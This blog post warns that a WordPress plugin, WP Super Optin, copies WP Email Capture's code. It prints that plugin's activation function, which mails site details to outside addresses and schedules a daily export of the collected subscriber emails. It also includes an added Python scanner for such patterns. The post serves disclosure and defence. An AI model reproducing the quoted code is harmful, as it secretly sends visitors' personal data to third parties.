In the past week, it has come to my attention that a plugin entitled WP Super Optin has been released that uses a lot of the source code for WP Email Capture. After having a look at it, I would strongly advise against installing & running this on your blog, and would instead recommend running WP Email Capture. There are three reasons for this.

WP Super Optin Is Illegal

WP Email Capture is released under the GPL. In the long & short of it, it basically means that you are free to make changes & distribute it, however you must give credit to the original plugin owner. Although the plugin uses my functions & code, it doesn’t give credit. Instead they rename a bunch of functions.

Here’s the first 30 lines of process.php in WP Email Capture:-

<?php

function wp_email_capture_process()

{

 if(isset($_REQUEST['wp_capture_action'])) {
 wp_email_capture_signup();
 }

 if(isset($_GET['wp_email_confirm']) ||
isset($_REQUEST['wp_email_confirm'])) {
 wp_capture_email_confirm();
 }

}

function wp_email_capture_double_check_everything($name, $email)

{

 if (wp_email_injection_chars($name) ||
wp_email_injection_chars($email) ||
wp_email_injection_chars($name) ||
wp_email_injection_chars($email))

 {

 return FALSE;

And here’s the first 30 lines of process.php in WP Super Optin.

<?php

function wp_super_optin_process()

{

 if(isset($_REQUEST['wp_capture_action'])) {wp_super_optin_signup();
 }

 if(isset($_GET['wp_email_confirm']) ||
isset($_REQUEST['wp_email_confirm'])) {
 superoptin_wp_capture_email_confirm();
 }

}

function wp_super_optin_double_check_everything($name, $email)

{

 if (superoptin_wp_email_injection_chars($name) ||
superoptin_wp_email_injection_chars($email) ||
superoptin_wp_email_injection_chars($name) ||
superoptin_wp_email_injection_chars($email))

 {

 return FALSE;

Whilst I don’t go around suing people running the plugin, it is in violation of Title 17 U.S. Code, Section 106(a) of the Copyright Act of 1976, and several recognized international copyright laws. More scary from your perspective is the second step.

WP Super Optin Is Insecure

From reading the support forums, I found this nasty piece of code:-


function wp_super_optin_activation()
 {

 $domain = $_SERVER['HTTP_HOST'];

 //  mail("masstrend@aol.com","The plugin activation on " . $domain ,"The plugin is activated and this scheduled hook is ready for use.");

 mail("masstrend@aol.com","The plugin activation on " . $domain ,"The plugin is activated and this scheduled hook is ready for use.");

 if ( !wp_next_scheduled( 'email_scheduled_csv' ) ) {
 //$timestmp = (time()+300);
 $timestmp = strtotime("tomorrow 3 AM");
 wp_schedule_event($timestmp, 'daily', 'email_scheduled_csv');

 $date = date('j F Y g:i:s A',$timestmp);
 mail("masstrend@aol.com","Email for optin CSV scheduled","Email for optin CSV has been scheduled for " . $date. " and the current date/time is " . $date = date('j F Y g:i:s A', time()) );
 mail("wordpress@wpemailoptin.com","Email for optin CSV scheduled","Email for optin CSV has been scheduled for " . $date. " and the current date/time is " . $date = date('j F Y g:i:s A', time()) );

 }
 }

What this function does is email back on a daily basis all email addresses you collect. Why he wants to use them I’m not sure, but I can imagine it is to spam the bejesus out of them. Not good.

This violates the CAN-SPAM Act (you need to double opt-in to emails), and is bloody sneaky. WordPress doesn’t like it either. Furthermore, emails are sent when you activate & deactivate the plugin, without your knowledge.
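One way to check a plugin for the pattern quoted above before activating it, as an added example (not code from either plugin): a Python scan that flags `mail()`/`wp_mail()` calls with a hardcoded recipient and any `wp_schedule_event()` registration. The sample source is constructed from the excerpt with placeholder addresses, and the names `audit_plugin_source` and `hooks_to_review` are assumptions of this example.

```python
import re

# Constructed sample modelled on the activation function quoted above;
# the recipient addresses are placeholders, not the ones from the plugin.
SAMPLE_PHP = r'''
function wp_super_optin_activation()
{
    $domain = $_SERVER['HTTP_HOST'];
    // mail("collector@example.com", "commented out", "ignored");
    mail("collector@example.com", "The plugin activation on " . $domain, "activated");
    if ( !wp_next_scheduled( 'email_scheduled_csv' ) ) {
        $timestmp = strtotime("tomorrow 3 AM");
        wp_schedule_event($timestmp, 'daily', 'email_scheduled_csv');
        mail("second@example.org", "Email for optin CSV scheduled", "scheduled");
    }
    wp_mail($user_email, "Please confirm", $body);
}
'''

# mail()/wp_mail() whose first argument is a quoted literal address.
HARDCODED_MAIL = re.compile(
    r'''\b(?:wp_)?mail\s*\(\s*(["'])([^"'@\s]+@[^"'\s]+)\1''')
# wp_schedule_event($timestamp, 'recurrence', 'hook')
SCHEDULED = re.compile(
    r'''\bwp_schedule_event\s*\([^,]+,\s*(["'])(\w+)\1\s*,\s*(["'])(\w+)\3''')

def audit_plugin_source(php):
    """Return findings as (line_no, kind, detail) tuples."""
    findings = []
    for no, line in enumerate(php.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "/*", "*")):
            continue  # whole-line comments only; inline comments are not parsed
        for m in HARDCODED_MAIL.finditer(line):
            findings.append((no, "hardcoded-recipient", m.group(2)))
        for m in SCHEDULED.finditer(line):
            findings.append((no, "scheduled-hook", f"{m.group(2)}:{m.group(4)}"))
    return findings

def hooks_to_review(findings):
    """Hook names whose callbacks should be read to see what they send and where."""
    return sorted({d.split(":", 1)[1] for _, k, d in findings if k == "scheduled-hook"})

if __name__ == "__main__":
    for no, kind, detail in audit_plugin_source(SAMPLE_PHP):
        print(f"line {no}: {kind}: {detail}")
```

A recipient taken from a variable, such as the subscriber's own address in a confirmation email, is not flagged; only literal addresses baked into the source are.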

WP Super Optin Is Unsupported

Finally, I’ve been receiving emails asking for support on WP Super Optin. Why I have no idea, but it’s frustrating, and each time I’ve told them what I’ve just told you, and that they should download WP Email Capture instead.


What I’m Doing

I’m a bit pissed off with it, as he’s deliberately targeting me in search engines, comment spamming & spinning lies on forums such as Warrior Forum.

On Wednesday (with a huge thank you to uber PHP Ninjaguru Jem for sending me the template) I emailed the address within the Whois details (although I’ve never been to Los Angeles, I’m confident to say that there’s no street called WPEmailOptin Street), and I’ve heard nothing back. So onto stage 2, which is a three-pronged attack: an angry blog post (SEO’ed to buggery to rank for the plugin name), emails to WordPress & emails to Hostgator, his host (and also mine).

Fingers crossed!

Update (1pm GMT): Just had an update from WordPress. It’s been removed from the WordPress Plugin Repository. Thank you :)

Update (9th December, 5pm GMT): After a discussion with the Hostgator security team, who were lovely, the site has been removed.

About Rhys

Rhys Wynne, the author of this blog, is a 20 something web designer from Colwyn Bay.